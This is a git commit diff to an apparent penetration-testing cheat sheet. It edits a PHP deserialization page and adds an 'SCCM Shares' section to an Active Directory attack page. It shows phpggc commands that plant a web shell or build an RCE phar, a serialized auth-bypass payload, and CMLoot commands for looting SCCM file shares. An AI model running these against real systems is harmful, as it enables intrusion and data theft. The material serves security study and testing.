SCCM Shares

This commit is contained in:
Swissky 2022-12-04 11:38:19 +01:00
parent 183876f660
commit d67ec2469c
2 changed files with 17 additions and 3 deletions

View File

@ -14,8 +14,9 @@ Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.c
* [General concept](#general-concept)
* [Authentication bypass](#authentication-bypass)
* [Object Injection](#object-injection)
* [Finding and using gadgets](#finding-and-using-gadgets)
* [PHP Phar Deserialization](#php-phar-deserialization)
* [Phar Deserialization](#phar-deserialization)
* [Real world examples](#real-world-examples)
* [References](#references)
@ -82,7 +83,7 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;}
Because `true == "str"` is true.
### Object reference
## Object Injection
Vulnerable code:
@ -145,7 +146,7 @@ phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data
phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
```
## PHP Phar Deserialization
## Phar Deserialization
Using `phar://` wrapper, one can trigger a deserialization on the specified file like in `file_get_contents("phar://./archives/app.phar")`.
@ -237,3 +238,4 @@ A valid PHAR includes four elements:
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
* [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
* [Finding PHP Serialization Gadget Chain - DG'hAck Unserial killer - Aug 11, 2022 - xanhacks](https://www.xanhacks.xyz/p/php-gadget-chain/#introduction)

View File

@ -120,6 +120,7 @@
- [PrivExchange attack](#privexchange-attack)
- [SCCM Deployment](#sccm-deployment)
- [SCCM Network Access Accounts](#sccm-network-access-accounts)
- [SCCM Shares](#sccm-shares)
- [WSUS Deployment](#wsus-deployment)
- [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
- [PXE Boot image attack](#pxe-boot-image-attack)
@ -3742,6 +3743,17 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
ConvertFrom-SddlString ""
```
### SCCM Shares
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
* [1njected/CMLoot](https://github.com/1njected/CMLoot)
```ps1
Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
```
### WSUS Deployment